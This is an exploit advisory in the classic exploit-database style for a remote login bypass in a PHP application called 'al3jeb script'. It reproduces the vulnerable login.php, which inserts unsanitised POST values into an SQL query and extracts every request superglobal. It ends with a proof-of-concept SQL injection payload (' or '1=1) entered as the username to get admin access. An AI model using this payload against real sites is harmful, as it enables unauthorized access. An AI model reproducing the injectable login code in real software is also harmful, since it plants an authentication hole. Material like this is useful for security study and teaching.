\#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |      al3jeb script Remote Login Bypass Exploit     |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------

[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Download: http://www.traidnt.net/vb/attachment.php?attachmentid=354606&d=1237376300
[!] Date: 19.01.2010
[!] Remote: yes

[!] Vulnerability Code [login.php] :

<?
session_start();
extract($_POST); 
extract($_GET); 
extract($_SESSION); 
extract($_COOKIE);
?>
<?php
include("Connections/config.php");
if(isset($_POST['Submit']))
{
 $u=$_POST["uname"];
 $p=$_POST["pwd"];
 $r=mysql_query("select * from admins where AdminName='$u' and AdminPass='$p'");
 
if($row=mysql_fetch_array($r))
{
 $_SESSION['AdminName']=$u;
 if(isset($re))
 {
 setcookie("username",$u,time()+3600);
 }
 header("location:index.php");
 
}
}
?>


[!] PoC: [al3jebscript]/login.php

    username : ' or '1=1
    password : cr4wl3r